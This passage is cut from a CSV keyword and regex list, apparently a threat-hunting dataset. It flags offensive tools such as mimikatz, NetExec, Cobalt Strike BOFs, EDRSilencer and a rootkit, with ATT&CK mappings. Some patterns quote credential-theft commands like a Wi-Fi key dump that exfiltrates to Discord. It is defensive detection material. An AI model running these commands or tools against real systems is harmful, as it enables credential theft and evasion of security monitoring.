"*net::stats*",".{0,1000}net\:\:stats.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*net::tod*",".{0,1000}net\:\:tod.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*net::trust*",".{0,1000}net\:\:trust.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*net::user*",".{0,1000}net\:\:user.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*net::wsession*",".{0,1000}net\:\:wsession.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*net_dclist *",".{0,1000}net_dclist\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*net_localgroup_member -Group*",".{0,1000}net_localgroup_member\s\-Group.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*net_portscan */24*",".{0,1000}net_portscan\s.{0,1000}\/24.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*net_portscan.py*",".{0,1000}net_portscan\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*net_recon.*",".{0,1000}net_recon\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*netbiosX/AMSI-Provider*",".{0,1000}netbiosX\/AMSI\-Provider.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","1","N/A","10","2","133","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z" "*netero1010/EDRSilencer*",".{0,1000}netero1010\/EDRSilencer.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","1","N/A","10","9","876","119","2024-01-24T15:52:24Z","2023-12-26T04:15:39Z" "*netero1010/GhostTask*",".{0,1000}netero1010\/GhostTask.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","1","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*netero1010/Quser-BOF*",".{0,1000}netero1010\/Quser\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","85","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" "*netero1010/ScheduleRunner*",".{0,1000}netero1010\/ScheduleRunner.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","9","4","311","41","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" "*netero1010/ServiceMove-BOF*",".{0,1000}netero1010\/ServiceMove\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","New Lateral Movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","10","10","277","46","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" "*NetExec ldap * --*",".{0,1000}NetExec\sldap\s.{0,1000}\s\-\-.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*NetExec ldap * --dc-ip*",".{0,1000}NetExec\sldap\s.{0,1000}\s\-\-dc\-ip.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*NetExec ldap * -M enum_trusts*",".{0,1000}NetExec\sldap\s.{0,1000}\s\-M\senum_trusts.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*netexec smb *",".{0,1000}netexec\ssmb\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*NetExec winrm *--*",".{0,1000}NetExec\swinrm\s.{0,1000}\-\-.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*NetExec-main.zip*",".{0,1000}NetExec\-main\.zip.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*NetExec-main.zip*",".{0,1000}NetExec\-main\.zip.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*Net-GPPPassword.cs*",".{0,1000}Net\-GPPPassword\.cs.{0,1000}","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","161","36","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" "*Net-GPPPassword.exe*",".{0,1000}Net\-GPPPassword\.exe.{0,1000}","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","161","36","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" "*Net-GPPPassword_dotNET*",".{0,1000}Net\-GPPPassword_dotNET.{0,1000}","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","161","36","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" "*Net-GPPPassword-master*",".{0,1000}Net\-GPPPassword\-master.{0,1000}","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","161","36","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" "*nethunter-*.torrent*",".{0,1000}nethunter\-.{0,1000}\.torrent.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*nethunter-*.zip*",".{0,1000}nethunter\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*nethunter-*-oos-ten-kalifs-full.zip*",".{0,1000}nethunter\-.{0,1000}\-oos\-ten\-kalifs\-full\.zip.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*NETKIT_LOG(""*",".{0,1000}NETKIT_LOG\(\"".{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*NETKIT_XOR\x00*",".{0,1000}NETKIT_XOR\\x00.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*netlm_downgrade.*",".{0,1000}netlm_downgrade\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*NETLMv2_fmt_plug.*",".{0,1000}NETLMv2_fmt_plug\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*NetLoader.exe --path *.exe *",".{0,1000}NetLoader\.exe\s\-\-path\s.{0,1000}\.exe\s.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","8","759","138","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*NetLoader-master*",".{0,1000}NetLoader\-master.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","10","8","759","138","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*netloggedonusers.*",".{0,1000}netloggedonusers\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*netlogon_##*",".{0,1000}netlogon_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*netntlm.pl *",".{0,1000}netntlm\.pl\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*NetNTLMtoSilverTicket.git*",".{0,1000}NetNTLMtoSilverTicket\.git.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*NetNTLMtoSilverTicket-master*",".{0,1000}NetNTLMtoSilverTicket\-master.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*netpass.exe*",".{0,1000}netpass\.exe.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*netpass.zip*",".{0,1000}netpass\.zip.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*netpass_x64.exe*",".{0,1000}netpass_x64\.exe.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*netpass-x64.zip*",".{0,1000}netpass\-x64\.zip.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*netsh add helper netshBad.DLL*",".{0,1000}netsh\sadd\shelper\snetshBad\.DLL.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z" "*netsh wlan show profile $wlan key=clear | Select-String *?<=Key Content\s+:\s*",".{0,1000}netsh\swlan\sshow\sprofile\s\$wlan\skey\=clear\s\|\sSelect\-String\s.{0,1000}\?\<\=Key\sContent\\s\+\:\\s.{0,1000}","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*netsh.exe interface ip delete arpcache >C:\Windows\TEMP\ipconfig.out 2>&1*",".{0,1000}netsh\.exe\sinterface\sip\sdelete\sarpcache\s\>C\:\\Windows\\TEMP\\ipconfig\.out\s2\>\&1.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*NetshHelperBeacon.exe*",".{0,1000}NetshHelperBeacon\.exe.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","1","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*netsniff-ng*",".{0,1000}netsniff\-ng.{0,1000}","offensive_tool_keyword","netsniff-ng","netsniff-ng is a high performance Linux network sniffer for packet inspection. It can be used for protocol analysis. reverse engineering or network debugging. The gain of performance is reached by 'zero-copy' mechanisms. so that the kernel does not need to copy packets from kernelspace to userspace.","T1040 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - 